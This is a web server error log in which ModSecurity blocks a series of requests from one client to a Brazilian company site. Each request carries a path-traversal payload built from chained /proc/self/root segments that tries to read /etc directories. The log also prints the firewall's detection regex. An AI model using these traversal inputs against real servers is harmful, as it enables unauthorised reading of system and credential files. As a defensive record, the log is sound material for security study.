[Mon Mar 16 17:40:17.494173 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:57096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqsbysWC90G-1nBrBd5AAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:18.702687 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:46904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqsrABkC4fWIHEf8EOngAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:20.059973 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:46920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqtEr9dMAiw-8KANNi_QAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:21.275406 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:46924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqtaTCbgAP5jq5TehFUQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:22.584898 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:46936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqttSswJuvopo3lOh4KQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:23.838861 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:46944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqt0r9dMAiw-8KANNi_gAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:25.189807 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:46954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhquUr9dMAiw-8KANNi_wAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:26.355344 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:46960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqutSswJuvopo3lOh4LgAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:27.658532 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:46970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqu7ABkC4fWIHEf8EOpgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:28.875492 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:43556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqvFajLEzk2WiQ-10r3gAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:30.168299 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:43568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqvrysWC90G-1nBrBd6wAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:32.232034 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:43572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqv0r9dMAiw-8KANNjAQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:42.291249 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:43576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqyrysWC90G-1nBrBd-AAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:14.289917 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:55408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhq6rysWC90G-1nBrBeHAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:41:34.220745 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:41214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhq_s_BxrYCr4hPDw8D7wAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:35.533852 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:57102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhq_6TCbgAP5jq5TehFYwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:39.955289 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:57110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrA7ysWC90G-1nBrBeKwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:46.754736 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:58228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrCtSswJuvopo3lOh4mwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:48.058258 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.228.16:38974] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhrDNSswJuvopo3lOh4ngAAAIE"]
[Mon Mar 16 17:41:48.075080 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:58240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrDKTCbgAP5jq5TehFZgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:49.247758 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:49078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrDf9ocpUE4ed4uDwMkQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:41:50.541350 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:49082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrDv9ocpUE4ed4uDwMkwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
